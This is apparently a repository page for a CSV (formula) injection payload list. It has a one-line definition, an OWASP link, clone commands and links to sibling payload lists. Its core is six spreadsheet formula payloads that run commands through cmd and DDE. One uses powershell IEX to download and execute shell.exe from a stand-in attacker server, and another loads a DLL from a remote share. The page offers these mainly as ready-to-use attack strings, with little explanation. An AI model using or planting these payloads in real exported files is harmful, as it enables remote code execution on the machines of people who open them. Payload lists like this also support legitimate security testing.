payloadbox/csv-injection-payloads

Stars
169
Rank 219,711 (Top 5 %)
Language
License
MIT License
Created about 4 years ago
Updated about 1 year ago

payloadbox

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

🎯 CSV Injection Payloads

CSV Injection Payloads

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

Payloads :

=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

References :

CSV Injection :

👉 https://owasp.org/www-community/attacks/CSV_Injection

Cloning an Existing Repository ( Clone with HTTPS )

root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git

Cloning an Existing Repository ( Clone with SSH )

root@ismailtasdelen:~# git clone [email protected]:payloadbox/csv-injection-payloads.git

Donate!

Support the authors:

LiberaPay:

xss-payload-list

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

5,585

sql-injection-payload-list

🎯 SQL Injection Payload List

4,301

command-injection-payload-list

🎯 Command Injection Payload List

2,638

xxe-injection-payload-list

🎯 XML External Entity (XXE) Injection Payload List

1,017

ssti-payloads

🎯 Server Side Template Injection Payloads

558

rfi-lfi-payload-list

🎯 RFI/LFI Payload List

504

open-redirect-payload-list

🎯 Open Redirect Payload List

494

directory-payload-list

🎯 Directory Payload List

135